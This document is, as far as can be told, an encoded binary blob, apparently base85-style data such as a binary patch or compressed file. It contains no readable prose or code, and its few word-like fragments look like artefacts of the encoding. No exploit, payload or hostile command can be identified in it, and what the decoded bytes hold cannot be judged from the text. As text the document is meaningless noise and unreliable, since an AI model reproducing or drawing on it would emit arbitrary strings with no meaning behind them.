z(L{AQ2vpStEn$R8gHMzgK)Lbxocvl)7MIHMskq!zupKB_$Nw=pE*})58H8fmsF)aS z3x2(Ag7Q%UP;btKL;dw*f<3qdbexn`G<09)xFc!QpUBJ6T=u@B_?-RFO{EU}Ap6L1 zF0ng~FhTzFHE)=n1{_jUNEJiTu$|0;H_k>I?iy##_#=-!hbHH{%$#UtAvYPS9J>vd zuzb|T(q|KNEa|D-gkNX{w1(hs(o)oaV~*nyvyJ18)8YCGpD*-t&=zH}ExziCm(Myi zGaFq69MNgNUE0f+14R#Fq zp00XRk#mR?VgjjPYw38-8Q%~r>*7aqtU*!I|0wmw{wY38irANe<L9^2oB<=mz6tbOUHhRZkoU04oWce9ym zpA@QF|BkJHvrTq?1%JQ(gRm|I%h_K|?604Z>fh?~+5bYIZswd8)olCAE}_{8tQa#sIbEC+E+93UaPiPm)$5W`8GGvd4uAE4qHsFoP0@iQz3 zJ`FtoGc3n!G{|Bz$dWzyigd8GQLv3?uw7!XLv^szXz=yTU>Ej~o6;d}Mj`H=A)bjL z-qj)4(U3cvAvpHX!&feFF{6GHnnGc>#Q~21c~JZB7h}JP-TqlfOti}GPLRCXm8xEz z)0-lFYhm(N+3jBmiBjVJwZDbkW)radC)w><@Hck*k7TzGTONv}u-i=eem`Tk<=OFM|L}7Mf2Fm(}h`v}<#b{E{D=C6Kp z&6&b(pL17w7r~bA@gA?sfy1=<#)UeVE9r=jp_lMS=X&N)4k_;t-n0ALe@}+Y zG#BLe9yy$u;a*Ew-3dC~iM>6E&k_aF=_(oRZ${Z4p1RQpWNa*?S z)H$$Cy|i@DW%m@1lk4i>UIV|?php9Gv)asbzkYMyp4OVEz9QKYcj=}#&Q 
zw4EJIxh6CQPvzB|VYv}PVYhWYSBsiozeUgWT3x>?bBu?@qkZS?bh=0SqVs3N_gtde z#ZSw&UNheX?@srzdL~j?xSV5RA6U=}Nj}NHh!ya8jl3Jy!l!fdg63ogGx^Epb8_lR zq;1xF1bMSj@eRo=VRxqX?CG!z7Nm%)V6HwFnBNW8@BrR})0oney-CMzrplW4$$Wld z510R1@Iy%K_dC3%k4h7`C{@|R(zupF+ccw+QTi zx%klMMA3oBhXKB*D{tLDKDfEnQlt*sKPemV zcADu~H`w?HM3RKOl=be(lZ1_#)1RpgN7L7DkWY)M$-6mKx9rqiRwr`~O;JH@AoB-S zic~~C`(##FG%5`Q9d^J#5LqMpvj-J+KR&y*TUQ0kCsG#;P@hEk&awCm82FBa_&RUg zs@8*v5n#dJRr&#^J-jbTc|e28e|s$^Rz&0no)Onj5s@n|=_d zYmiZ1keMgk0ukJVMqQ=U&4x1YS2H*o`8&@Ap9O|&9)wD$1uO*tfph-eiPxHQEjopv zJF1Yoh|m`sj>AEfrlV~VF1a;mEd-h%&YRbRcHeBcQmHiEiYxWi>$?G7X3HT_! z*d+?$itiGMvO-f?j|TD#z-Ty-L_AIQXrL%s2fPA+6JV4sNDcrDrVmoZfWT7-b4rV` zCCm>EO0+{+13(ORFfl#Y2MBP9NLMpJ!#EE|TOu4VNg|Sz?oj$sB9c!%SfG=xhw?%2 zB?O1MRbN9j49AOjF^Ex?3xhF>$`6io+;3%z^Xj<2!WJhZiqofxP(2+0Lg17|AIM`M z{W#jBZXBm<*9v&D+hrp*Ay!MXlFi3bS$hniK#W;qD>Sx7pHT= z=)q_8G{y0>ulGU}YXf8nS(-9gl4|Kk?9!LEvQU=T^3AO3JnU^Dqx#N=)YA`(aVQ{l zRH_J-76L%42N;z^+JwPqC>()g?wA1T;1r&ls4zGR3;~?uvIOvT0kuZ~3CB@zOQ644 zq%J#fgzQ4=hJmx-aw$ix`iVgj3z=|^N7eZ^riUM<6+9&7Ka%xkI+JX%wi$Og4>J24 zt63025=9NLlw8{95paAo4Qf<)LL^qcE4?5&t<2=%d52heKvC!RgZu$#pCz@mW%voQ zbkR&)SrOp!hW*2sbudlJL#O%tG-dp~y!@Lr6m3^f8lLj4qj{J^r?!P{f`r>RSyh}`EE!m<>`K6b&D6~ub8*R%^`uL2%aIAj%-fHyV^w><;S z6HCPw3lI5(V{mEW?B&NDsYNHC`*!7r+3okMiZWO#c13gEvgZ!f;wg)<`nn2-Fdz-p z)AK%XR1?623uw0Z6re|yC_*J5nRkr_Xn>2Pb)km%Ax7sa4KSxDeY$33uF6p(zzbZI zbzT&7x(=Mt2x_WpLRAxLO(A^GK8IGz@s$dylopZV6sR6Fss$981V|=kw^QLxN|v3U z%92g7(C~_rFDM*7ot`y8j1v#fCqYdxP)9U{TnV`2X+hm%b!M@=c{Jszcr|F{;qpWk zYO1a=C6ve&WGdbA*q9zE54&1I#Wn>T?Ld5-cuHxRq;)~`cLRpRQ5_S35K;>)gChR| zpl}IsB*4X8fbe+Wlw;!|@8F=(x?s-|iOJ^_)zh=BY>~EL$__8g=W;~dv-W%8WYaXD zTupx`_2j(*84=ulu4bfJY}!sbO0M?fe9f?Nlm5M?i;}0g$=KSt=k0>KR^_r0iayQD z?A3_r=0qg&s2t$9T-4$e-6<@kI}`$xy!T+C1+VDZAIZ*0k|%B29gMP&dr(m z)(7E&j`0?6TbgLD*F-gFwn=-Vtb*I@i9Ey@WZB_!4aI}aryDT8le^#VZM7@*MrV}3BNt1+c z!65=A^Z51Xx(ATGfZ%xm5;6_Dj)uid0YXipc}82#?dDRtR*NK1F_x{?;jL#R5~1?l zl%*nDWH-+gtWF{YK|n4|bvM*CHX&cosQ2`e9oqJSdO9PRx_8sJ#c>0c#vOzJV~6`g 
za>R$?v1(~A&l7qvieS1_uUSeO$L`SlC^SPW`jWuBlhQ7Pl zSH!9QP<#%rG#%7;prr)wL;$(@-iyHy7@QFzBtS8-MO&nsHFEIr0e z03RM1y}Aue#tmIX00laS4)eSq7S(;~t~5FD~VG*GKIN4L-P^)6z z!Q_Zt(Hj1`m0lv=ap6$kC#rtKJ$sXeVG0}IhygNVuumI^=2UpOPmh-8ExurJ>stPs zsaI_xUnNPjMd9EN3VK(0?+!{G_e#8a}E z=L8poK$@Hu^2J9zI#KO0@rJ5nj|YHpbc+U8?`zR% zYeg3N8)Jy{{$kAQ;obz|6e5ZM8?~bX6JIalY0OEFyTTD_fS?N)ln}nYJLL^+$(v8w zqd}6Dw35MFc#fh)Bs^TRaP8O^*R-sD3uT($PY(_BEmRI@>n82 zn)D6Q;xM)Qfl?)KClbKldr)KwR;z=GlSJ)20MK{AtS^jpSg(4BxV{%Ty&Z+lbG4S^!#(L0d&BeD#CDl7fjbkijsET~^9^b9rc-T-+w%F{9#i49b&$;v~_4GCt+leUTz}PhFqg zc3M7jc{$I5A)R(jly8mZT$-TI8ueRJ*nSq>AxBq;IoyCoeJfTY0h?h=Mx%<2*_y0F_HsYmrKmtqfJ8;>vH>~|&obNT7w9}al15#$GkDT5 zO6*v|GZ^?HDH3F_V6j#E(6 zF+Yr`H`C#)Xn$~LmijAn2ZruwOq7gR<0_RzW`u%+Ec4juFwufbX4Gda0b1c_$ZsC3 zsBqtU>8g6bXKh6l9l*SL4k&wKwIeVPtS#>sQ%h!=Z8gOye3px)BSVeU`Ah*xy8^^huI21lzH*qS5 z4j5R~eZ3@L&hhE10z%6#w)+Mff2EOow0V4i_q)fluWfE)FFmt+I_z=z&d%43%ed^1 zr_B9>%-trd&{OZkZL0@@p8B(xB)rzt#&HGB6u{8%uzQrlBdRfO%q+K6+U{Rje z1nCc`L!l}%0Dm?9tuFSfQGPMk(mXRaXEQqlKC@+ppW2?ge1gT>K7&tST>Cy5%yF%t zu#&v(P*h%g=~{YS-`8NObJDmlxL6=M>DVzn*#NFn3Re{nJm{lxpmFHe&vnN+`!Jh z=>n0#(D(K$Q;)r`^~|G$Ra| z={_nxdV936YTtXQoNVYmUZ~(bB|sMcab70y8K$46r*?yi8Ez^^3dG$2gczaCGV8iP1lLvG3 zBOR^ZFC>mCJy8w?b)cK+B|~a>Q9#hOyaBXIY4q}K2D^t$SNWPY>)Y|OZZ90K3h->H zsbwN>xnxpo`=md+b znLerkr%OM>ud1~H&klsF>1VLuQqy>psrXH*K}#qVg;AE4NGQ9>cFvB7i`K$!6HA4i&6&H2Y6dfNOvP%WsK+(h zIM_u3m{yy%oS{Iy6MLT9L zRn>j`gwLT6i-E%I9&^sFkv?W0gbXPPvFo?ecFg8f3~OIxU%&m>$9&0#q7eId-J@a0 zoD^(W|Nh_&uU;REwH(8S#cMZwUhi0Jwiz~l$-d$H$>;L!jN!ALk2mh_?OX=Hjfh|& z7e898B}CY$iN?kyfM?edp=#93l;aX~2y2D3HEQ9SaS1uIYlR9iY84Q2y{C=6!klaL zT-?Sr+@I890&5$bh~ zN2ZNnZRKW-`+a6^J>1*1#lTGl0)*T$XnpOJgiQv+ZQLI5?AfWQnhZV2amzmBYp-Q% z@*-u%E%(fxy zdybZH)6o_o_tHpTCu?ETv2Gjp^0YlCJ5|&17dh@vANx8x*_uvF%(z!I>^ZxHm`=VI z@~G+cz3!H4`g+mEqwe+IbUu)R+MCnzr6A()Qi*RLvJI zTWKGD_myG*c-H8 zu_s7R@Oitp??HrHkOG9U)3k40l6fswx<2l_Q%-kpS3NM{fX9A3bayL8{_Kh5cI@oc zn)L@RZ@xSd_MO+h>-{p<;%lL;@1i-`d$iqRy*$_Vlk;7l$ytkyx>?`PzGSk`6#VjL 
z%QH^((7V{!g9o;{c{yAY$=Es7%iAwoxM!nnY~NiBi{ueF+gq%NCE?v!$7n!P%{k7 z2?NJs5D^%vR19?yhNd2a?7@hX)6gzq=yx$Fq&x$+Jfnm>lbk%WmOP7@JgbvD8&;k@ zLY^a4p0h}vt6rYFN1kU={=kwv@2)%=sldmrz%QX7Ag3UxrEt(pLC8r#7^@%>p&**7 zAXcOxUauh0qi|?a;qa2ekzEBzq~cL-#bXkR$K@1HXepjFQ#|FQNS4AXN=GQ3PF0jC zQk1P%l&#j~&p`<9Mq@<;!Y^J2*q@;>fQj1VhPgT+=Qqrtf z(&|yto>bCVQqtX3(nBiib1R>hP`)6id{Il;z)bm)ld>UJ*(gHUI91uCNZGVr*{ny| zd{WtBN%``wvL#Z*id*H1gvwPp6>BY(Yi24oPAaxo6}t!(`&1Q&A{EDa6{j8*=Sh|8 zODZ>ZRa}s&uH33OB~)+8sk&*Y-ZoQpcT)Ahs(MDKdZns*7peNxt73apeJ54#EUDhz zRmCCI{J7QpDZ^ShwLmSkATzaKC$$i)T4;pYy;QZZBDL^(HF89cTI8f!)RNl$T{S#X zJ(^oRMne68oO-O5dYqYhypwtYRy{F7JtwUOlx(J#A7weM$Y{t~vp!k-@Ez zDWUO5P9sZ8Bil?P$4Mg>tC1I>k)NtjP^3}FU6GgESoGm2UEtHl5sgpkHA=ZP%Oo_* zNV?oG#e&08_nXV=QN2(ttM`*W~~U+T!VnL z|F)6e%NMv-z!^w@R?DrP<|3``m+e&OHpyzOz9p^xU9AD6_Mln!Gj8n{fzMjxw1>^K zUpZ-yV6{ghw8v7l$BVQl>a{0(v|mqZzgg0LyQ@8g)ajV!)_EtP^IlHpgO<)mGo2YH zoms5TT!hYis?I`@&SJgJQjgB3NuA{-ozJ^EB&6;Nx9+Nh?iV@TH7(t*X1eQ6x*J&C z%?RDCRNd_&-JN>f-5%Y&N!|S=-Nka*r+SUg0R!klzkDR@iCz5;JAiC<_&w7zsI&s8 zp_$Qc;6QZGo^)MHqFy(}xAF;zd`eG$vXyQQ!@Q~2rKiW-AVq7gukZli4i0F>fU+Kd zjW`GA-Vdyk0Og}v!7Z|EXS8XIkWAI(xZidY4FpICQ*NS*pnKo9k^q0Xl_WJSozhD3 z5Rmy>TS` z8hR4?j`O?Pz}Az5A8P|IYDp9RQX6<%M~PhbE3G63g~0zEtt38-$BYtcf2B5%Eg0hY z1UviJwSfn|K=x^Wp*E2GQ!B~e=?(m+T1mEk>J1c<-RjhfDvQn4`Y2|))n)Vpdve%k ztJ{*UJh5GC=2*(ldjtRE+Q6~iB^wHR@~gdp|01Bw3FK_mJj>3 z)-z-92d5s7Z?m3X(q;XFlk0D7{C~19>mRl8{}1T0e&gQj+pOo8Q_r_q&;LLh|F_ih z_fyZeSh1@bRA{P5%}}1$z(SKSoiZE}u`JSX3icj!`5{@pcc=|6E7Y ze_j*M&n&8cr-|pEbu|4Zi)x@N)Ghb#$HG6*qWVYCPy%>>&EHy7l)v)c?N%1*QiURQo0TmuRf5>@yFIR>K{fBLPf_e5^SDOzlkar%hZuW2qmzloC6M#)Lyra>3PABuYjKpScb#;+N!1hQ*c$-n z*tXvEckE3&c5NFWc*~JC?j$we5W}NPT|X+&b4f|1xPqiYe(LLE{5j3Tpv*aGf(fCM zRqR3KiB5uw_QSK6XrV(yWpqs8?SgFPxgZHDKezg1s=*Jq3;Gl{4E4(*kU<`*s*+nI z=ShYJSXjFN&8L^?&%#<4oulS&aQw!F+^8vSv0)jgIae4CrEctp#3LB9YCU)*wQsWF z&PZl1$-G&oeyO0mFpThyD|afxIb=JSQeBF6k*#)qcUat%EUb17xB*1*7>t_NQ@uE= zM|1Nbs! zn68VUd172}goB{^(f}yjz2bGolPSW7zNR;aZd>n`eg@L>{F%1Cey0k>bM`*p!Ixg%+$Vmo52s40? 
z(6OKtM|V98T?j(Z=Jdys3_v0_Occefov3dMcYc+0kL$`dRZb$_f-0XtecDD%1QaxQ z(L!R`BS{L})MRXGIIWD&A?b_qutb)QSg?ONNp6CICx?%k=lBs5CIu!~NC{NBC;d81 zIZx>OalS6iiZSkr8F7-YipgCF8mwI_y89R1JdN)PwCYIDK!BK54?vL~)&Kz0pE%*C zN`HogrV+aPAqB=^y?a!TN@k82D7JQL5Za)%i7Mfts-X!GgAQjX((6hLwTc0cD=0Q{ zKZu6OLm+b3m_#8+Ad{t2CKY6Dy-I<|LbImOP{s_Qq7t3LDH2In#1B`Uvt0z!9LGrL zb;$Ifo?woQh_~>XyC6Gw?;u-Y$j?LQp1PCAd%wJ}cZs+$tX=K+S^nUnWZ7Lj2DD7k z%{xC<(9=^Idd>AZ4Ro>?L59$rbbp(sORYz!Sg=4nuW&kSja{Mm?YQ++V23J50FHxL z$?Hs#`mXIfs(jExESe`-ihL*+%qD1o8!T;zAXb7rUrz7L&?VCoLl7?M{KJO8uF-3u z97UqGW6oJeTny0e^|wuJ{igI~oubo*hc2Dd8MC&1HDp(0H$>E6VRz56+TWU~8#Gy% zQoh}35XfUafiaj9>foK5J)*a#n{@t>qefT1bsjNpBgqOhXnZL*I3#rm`2jJ>5$ZC& zAs|LYb>^ZTy-!v~?1mOWRU0=vUzYH&izIAn0l*)G#l}F{DP=x(I1FbjS_)&2X1Suy zXVJm;(ld|N%@PwvK7qQYHedx8Er5iZK?GDpP>0?Gs0oOa0(hovjUo9{n8QX{eHb;d zAO$+5%J$j-gpIRA#>K2MX52BadHt&nkCHS>gg|x}Fk5v~%DdJ`8#g~d$O6E1{blaC zGkkhR{$TD`7mH+N&Vvaq;78Tdd6L>1=M##U4J28bwW;*Z*=)wjHv;^@fkP;0M;9h} zRo>xofq}oJm6DP)@Pf-U{bC!t^$OTZF+s87&N8HzRR1Cna zSIT3*YB_X$`axzn7D%w~hR!SiUmbW=T=eO>jqL>l7w8oDma)9e89Q4d^E*j*T5Ecy zIX}89!DLYSZFN31F5_`ClCD&25&UpK((^9X{$dVm&cjnlid^q{oeW;`DTBK`5fsB&#LH1PGMiE8x=*RQOgOK`ZUV`WnQfa|$i>{NQ< z$NcaS%lBTIfe%|Nz#Jb>)4(^0z(za}RYAzVJcR+c^W)P6ms$ENF3qPh@&e8Vxf?Pl zp`DCURVar|X?#TR%aTNGqj2Ud9D>bF9jeUTbV%3<#Mr?f(hwRXp&`fvP9A_C7o0i` zItnyEScblKQsC@sedCKL<2Vwfe`xVuHp8J|7%E1Xru}s2{J15GUOGs+gjxwv&llN1 zrVdQ14U98MQw|ZiSDKvVqYIpLd7&!D&p3pq1!_$|=+WV7Z#d{;i@tQyXto3%#e1r7T@! z5x%|H8Y@{YoxI`?gxq{yG9Dr(FQdzLKd^QLJ492t6)w+>P7b(ef8J5>LPDdpIs+FC z5Rum^$kT*7V{(-{cDu#wbs$ct#6W9Z(po5mNPQea0K7^S|QY}{HF_^ytVZoFpnfU*hy6di} zzW?$2Qw&27-7qk8H$%@1AtE5%-Cfdx&QQ`4ii(0Dg0!?qNrQlhBHfLGgoH@V#pnI~ z{c+udv(8!T?DIN%Kb~kplPKDZqx1lF#Nk}`?6XJRO91%Z z&t*D>m{`<(M5?BU$%OR5HrfV&#}SEu7+AC$Kei_Z$6C+#%fW#9RaGyz&leY3eq#6} zOj5$%lDyouruD(lL@oC$UFD-iuPbRVDSiT?+dag58~~f(LZX+#>Ht1U9N-C%+rU_?L3UB=(y71S(^0!*d<=@}8 z`1g5F^-O9xP4Vkhb~nIwEgLyzNF3k{B$FxVH^3Uwu9Icn*@gk*i$UBB4e{+$@0~v$JP6P~y1P~;xqvVU8@~V-2oU7=2a+Y@0^%ZlfrdYQ3qLm(tmcL%^23$|;BNsSug-h! 
zQ^a(9@W2wB9yLruKH2yK<{gdjULXW!NeWr9*+#*Cp_Hf2a;*9TNCHLQlsBI5WJDz zWta)2hQ`#g`cs$a3c+icVf?sv#A6H{1SzzG zkhxmcga9y=0W|SL1Z{7)$zch|F=vSuR$H6(K>-^b=xW#%9Fz$VK$DRgY7!eovVs6? z4kU&*xJ5UxGa2#bz)s5&o`|!fSOx+!D$g7321%cO%6(#X+W~4wq?lE8rTJu(25R`H zgv^1pQV1USi{qI?2^S6&$p>fggw}=7j&3NYz7Spd3%Rf0B#;BBoB)xc`2)D&2?YQF zi4rO}K;ZNl(IGE88jycL66)|AEcu*TsYEmYz}{J&=lLuw30|lP_bD`k1ORU>1L9^m z_iLG4airnPHiLB~kF21@gcoq6HC!}FC?yj})mbKW>q)Qy6Xai+9>OxdMRYLfjqY57 z{!93`k8o*q@k&#DULi6GgF*>}A0!jzc?2P7NGacY1j9Gd(n?4n$Rv&u^#DGbr=Uze zxbCtCw`&va5lBkn18gJLbkHD20RCdR={)X3WNCq_b2G)af^`jeO{c!i9OS1_p~_gC z9)K+Uv;dqbmM$kr+bGMO`?1384SC?3yEk79Uhp%73Hs#CkBpX5i6S<~B6_Y?Hc1*v zd<<15P$M_R%K&~;^x}jAZk6i>!=ZNNZ|%RS252%s9bHXUGJgpHpIXtka>1N))4yL7 zn+d@TNMDT%rvE0a0hd@|CM|F==Ju+x>U&m9Z>5xjYOS?tbO_pYGbtHdH5nm-B8ks( zO>3Em4dCC^h2FV9`D+9zfad0fig<%i0=CqXmr-jNFesJ9Gy@q%@dS{50@vacQ(ig& zvXMt-OLs!s&#Ssf)tv<4eTbjGS%9fEsMx*RK;iY1z^771@MFy$ z1Cn+ExZ657D_}_Fk2b>uF=*z#PEgn5`8S}TW35XoCg1g3ya~U*PM`Ha6M*~n& z9iJe)Nz|bKQ5N`>r*=N`!vaCr4b3=Hq39I==#l0HRzgX9ia8>xqjz0yI%CaA?Z0>4 zG6%pn3AIcNI~+b(eS2AcAjRU%f0n^Hip@<)c$1%8fzD$WoOliFYCXwp}*M#Y>q{j@TYY3{i96mN3 z8(2LTPxuxrZw*Hjw8vxsivr=42lSOX!UyBSu>TKK^x5m(pV^uo=+ln1ktl&=eyp4R$!%Nid+TX8-hxn;9(=fqS-z} z1?;m^JVS46XP2?F5d3Tjg;;UhY+&pVks;vf)V~H%q=z1U|D38hje0>c#ZeP#crx5| zA*qL$=j;TIzKQYAR-A2y8;ldRm%?oU3$|$25}%YQ9u*?McPRA&DPd({K4yX3aAD&2 zY|xtIIE9!2coFuE$ni*S`*(w0-(tKQ@yi+#{~GvdJBeM=?bi|T`^%*F4@lBlsw+f=vn5|%(TTws7WEQet^|$Ga#S}kbr@bX$!j%|oWW7m z&2#lBRKf?Mq6e+rRnQL}^PK3^p(MS;8lc+WG6#>wv9j*VL#E3En(AmFNnABr+_72UTQb}zsoA9Mx~LpZF_ZVmTW0p@u+_EL0& z+BcS^KqZH1U_5cS2&1y-R@CCwgVBZuvZ3v1>*(vP1hH9jg5OZQ{)(CE#v?yzzoYHZ zRd|SVGLmakDgI~Vz2QZgc{$2dxsH^%UgkaFj4VpAoFJAsma%t>zivdnY3>;P+LAcR zou>THNe_0Ur?*>F;Z}QFHNJ59g5((IfGe%mhF2{=B-WSTYub)^o^1_44wb`4cm zQ>x)U--!JViw~`K+Bx=Ct3{70bN;19bDXZvsP65K!apwVCG_vCT<=74>_Rh>`zSYM zbLSePXaed3UvvDLuG<6MT-7pZX8H!?t7zLAF#8^Ofo$)<&x1_ukWMw3{^n)2zrNpb zILou&uD>7UxBqAIP2cD~6W5GDrszY!LAU5yD;r>g5Z!wB?^axHG~EBmj-eoipKyFSl@vG& 
zQa|(eKTLRdrXzgf{{AfewH}sm77ml~d-yB!^-736{621<&wrP_aE{%P490OLPj#B~ zx=8=!zpSrk75hik(dSiaE6+GD3T^%wcwanLy`Zf=Ckg}$7Od*34bvZ9Oy-N$-2EK? z;IjYWHWStC(5G2z!exWK2buWQBk0AX+ErlD#Vq0dO0)gN>gd(xmy5E>{Q=e1SJk33 z{>H-uxYzr$9kpYgsWX|SE5_>U!>`w~PY9<}a6Jemk44S$GjS-rn9KCoih3e7ul`$$ zT5fELo`l=_^tYmcG)~QQw%hST1N20thQm{JysBPjE~~@0vP*`egvl}v!n4-z7GUBj zd4FYls2APhpdkLyO_SWw=Ylt?jtrL(Ca!p1KSv zS|=eyzOV*UC3&1mGk8@~S*x91)AsmnzrK*+$VHUS5D(MWnDQhEwc|f`P%}^N-R9pQ zHx^)6s`Sw+I`*Nd&9D3;U8G9UYFvRKL=nhU<5)tD4YiR^gN<~A8;^~2Z^%MpJq7Q5 zq!#s`C&vGgh39^^W$H!qY~X{0W*1q5GB&HmqFz#2!%A!V6VrM-Tk=!$Wvu3jg-f<+ z=!_0mX3$$TE!P{eQ1EHp#6eBGp9SYmYN9nO9vt?izP~TqB6!?1%raGu zL|qv^@v9aY)a%ht#ejU155Zu_Po9g@Y#i+$Y(2Mm4)=e|6 zZ?nxJe-?jlW88YvxAypF6zeGA<60i;yc3yKPv6AbDze#b8L`L*nIrf^(J5~_|HY@i z8NLgUEJkNZvX0HsjRs8$}Q%M)e%fa{_`Dn5mx>--bFHjAdQH0aMMC}G&ZqA)e_E+2?t^(8fd0}YvLs`;R6~d4<}k%&ihV90 z1K=NW$3&n^Zy-g)0)(%QfFYrA0p8S{Zx#t{NAU(e2E#)Hv&83@yk8%nV(7PDJ*)j! z9Dr9^cci+XE%5H&nEdPo1@%`mxcwMRPqki~CodB(6^>pZq0X%{6sWd_Juc>%v)olcm1^MWqgY`+1d8we}rt-BpWbGdvoy3JY&W z5V#W`k=Z!VLVqH7+3=5OaE?^uf*5YYt_&HT@ATP~c@U6exA=Dn8y_YZ)(W00&LgEj z>WSh0ZIH24Tlln^X%Lx(P0+E!WmmQVL|@{F*O_TTY_siI9(lf#-GrwPySPa+X5W(G zp!L+cTmeUa8*m{c$9c!WdWA_mwTcuBDOOq?m|=euK~EfCMZ@9{QVwvqvSbt<)+I*N z4JAHy%uCQl^Q$RjuxE^GMJwVUQU|!ebYnPwxFPhoEP;$=6+~p{jy;j@zz44Y7-VDr z=^6tgPBHK+y1{)bfNBs&0i^2*lbK(l{5JEwgt1^ZJ>N*u{DA|3}!F}Aj7OIPSmz5pzMqbnP4fafYDCB+M1K}HJ###CbvPZ~5| z6?)Uc_ydvN=l9z6hAey~22QDNu$-m!`jl*`7=g(667PGaF$TE>kbX}DKdY&g>t_cLjHM0RM*9F>jyk;vjEbh3^(CFfrBH^P)Y;L74vEv2O8U~9ss7f z!(2Rw?9?FsfME?yBK1l1M8e+iLW z*XC;l1rY!rX>L}U6c`zxLC2WZoq}H=lGr40*CW0kOrcb`xVS{NW4_=O7$W37MhCtA zA-9WG&!O|T5DT;Y8$fz&oL~ z67EDXoB(-+D&_yk!p?!tHqvj(WX7`b4(L5$9Bf+VOe$`^P}HGE4vJ7KRN|0^#ch5U zHuMH9kiCVYiEar1NwkIcv($cNRcr6Gwd>$i9Ac4U??4XiugT&>=kPmHVBn>Y^iBH& z4r5Oh`9K;+oA_L)RP>rzAyYtsbBe zbAS_KEx%)+5hDO}tq=j#eBujNeM$?VJK%pYCthOIaW4xHjI434P??@B9clsm9BM{N zK=$gZJb4nGQcKaxBqTn4wA1~34zb{jrnQ|4u@TMxk%c4bb`XYlN9x}l+8)=`mj?*% zgCPmKFtxwjcnZ(oed)7VSRlEA_A|3?9)Do2L840MKI 
zI`(MoD)Kx3BMaBdY+Z)x{*NqNe^Kv~T<-H9Ss1KS{VKJ!@;|aL?sMBKIL+>z|B;2t zEuW(J-raBMw$bhP8F@>tTdh43drx=hhAebx>^Y|T-1Z+?xLY|Am-^*W_q&MR_-^5t z%#&}*|B;0wuYT-i^hW(h7HYhhw&8f!`X5>7@@#&7h_G;}_dl}m$>U`@^7keqYyTq) zN4a8jRZK`@WB(%yAv!-rNbOukcmGEgewCfm-#ez=r~8jA)Rq2YqbL*c|Hwii3Do)j zk1Qly-o2@)0ND*dq6T0U1Bjjhk*xvL*MKo#mV!?p&w*l3a z0i5F7l?ffJ@h-KBA)THfy{#dGuOVZ!Ayb+mbDkkfl_6`pA=?*2cGs~Hg|8=G+2ejABj8A(tWOR^hF zi5g3*7|ZAx%i0d8`scmE8uXUtp-h>_fq&d-~6>p;bZ_W7T z2|IE#=MYmTUo+mSQPp!(ucxNwA(Qxw3EwI+-?Yhi6v~g+%*u7rQghO8!!#gd(m~YB zj^5n&YSQJmnTx1d!k}r;f@y5{)Vnovi!bJ$CuZJx=9xI7@>gaBs7aiu1y6F~(dA?U z&M2|UJfYZ}kSJkMS!xl}K4sNsp5AWm83K!CpNe0YN=~zIt};(=oJw4NZYDp!6MmrHaFU=xY68C z#WERZRr$rLBF(ah-s=6t)IHm&^kU0u*Qumv^S2b{^Hedsf74w(wl zvnu#)es5wnc*2@9-aKi+y12@^=F40t`xIVp{?Wp$>w;Ck?{q)?%xjpM_3h)t^O zY`*PmAv^g{<9uz}+#u0RW}{UW?~L1*#LutHx$~y`C+1)BT0{`p%=TGzSJ{5KGS6dQ z2ws@4xUwWvX)Zi1o}F>EeM4c_Vr#XYHalgz_)>PhxzFs|6>O_&af@i7TGJXwZ~dIz zuF2F6&%0QrXV*+WXV$)O^werUZ!zb$>Aa?W2>axo>s*uXlCQ6QLc8_;54$?tp zYQ;V3xJhCCJjCiTY87d=uuHUPPGRr(+m2dn`Nx9YnW+tZp zc7hBG1efAfgx?hLqy=BeLY>~?b-Pom?V5Lv=HFFCxwKw2!oX>M)XPFx1q7=G$`DH_hV-fve1xM*d zu$G&j+OYa)>zc2(65;18#^5HC;O=0z^{d@AIenX7&gr46yNH};a>A@5rR~f1H9@x} zmuh!TeJAfx7h}04-%w|tQFlnSn~T}cmy@n0qt5#QWAKhz+{q60v`qJElil>nbLlzt_G>bY+_QEK zv9E7j?O<5Hh<1AyI%A}2r_kXBJYB8HSqKZ=XcBXbww;rKIt1={{=Axcy!oqh(}Pg6 zxb!>CF6PvEPHX-}`sxyg1B00Ngs2NCr3*#BgT9%M_XCT?^sSB1^%Us($3>UT(LMD& zukDSQS5NnJANF67&-7kl+WcMHT^Lf>YP7(_)?jly2aD{|=SS zzxs1Sl-9sSPvC%0+2ro#Z=a|W$Es>;>yX(AK3_Sl-#r}LZXI6AeqI%F&WCAMn^ix1 zL}zL59$t3rwJiQZr3cK0dV9F~T(R36>^TI4Zt;*%EV)OTfM?JRq z{LVStkK}@|i#rHD|9;;f<^dmv`2CTRKa3lDGNQqQtupaRVYAX27-{YGpm6`pq zszR{F`B2d&h*bE3|{qye_6HmgNHJUZWQ2>Lnh0=M+}P8cb49m zS)RNrqqe?v0uc={7JnxBG1T|#34uJ%ZR@xYAL{%l*p%__J@HVD!c)r+A@IE5G6xPK z(>G+%ry=}dkT3TnNemRJ7NfxQP@Ae>^+SV4^|HgBfKX$^PM_1 zeSGroGSu(Unfc#P{|{#=VSfYm!*6jKKKgst{6k?Fu!rU+9-I+2{Qr2%PXZrB zd^kP}eRk&HFX-p~<^?F!=;3R>879Y15sqIU+srVL{yTe~e5^ec60m=iCjQrlIN}}u zaXBF(fGXH-;Iwq>-1zR_w57-zwSO4|gNP}n)TO_!pTa`@BZ+PQ>D}Ub@BT7REsRcu zTkFS} 
zHG>waD`uzYg2(5rx2_icMz24Pz8iMs&KceCA)=A<;!{`z(DlL2*1bymFj!+$_M@{b z|C1rc%Uu8PX7>mATjA+bS0BWqbKjrk%isCS7(OB%O>Gi&>JxF*9JNB6$Oj^(5t)ul z?us*k^Z9HWEMpU>7*&IrB)K(W>4dSpgOY0lX|%jnZQ5A{gGroJ`6kVEygC_3^%4_{ zdPMh27ROcP&&K>Z1sDapdCOpz;am=-({+V|lJR7nFdA9U6QRlCyU%iEgpP#A3wR38 zf4pe)9IbPn&@svVUZwYe{PQS%3%&0^y-58Zm6i|w_O<9%KO&#A(wUxQMnVe2=6UVv z(=2}DYM*~nnbx>UK^j6_q z3Cv#2T#wiz&$tq~l2P1Ayt(1rH-VRC?iA6MGwxK$ArvxAb~YTDuJEfF`B>%r44Hu; zRp80gWQpL(x-ImPCtFYPAI}p*9R=Q}rdAQWIhI}@d7s%v{^Nb_n5;nHd*PZJ!I$e< z{*mvcZ_7WvSAjzc{COd>5&ZcPzdrK6jz0g#Uw|i76ex^mi4=H~B-A2Ml%{wt@HSIN zQLy-_Rit3a3$GTzcX^TLf~AGYib7?@xsgKUW#uhG6;&T}q&M(9}fn>@OT|{b+a9t$AZ4x~c zN|zG7)OVC6`<%24B>S1)TY+9Ocw9;ja-}Fsedc``B{d{i(Iz!4+ImTl8j&1Umi{6; 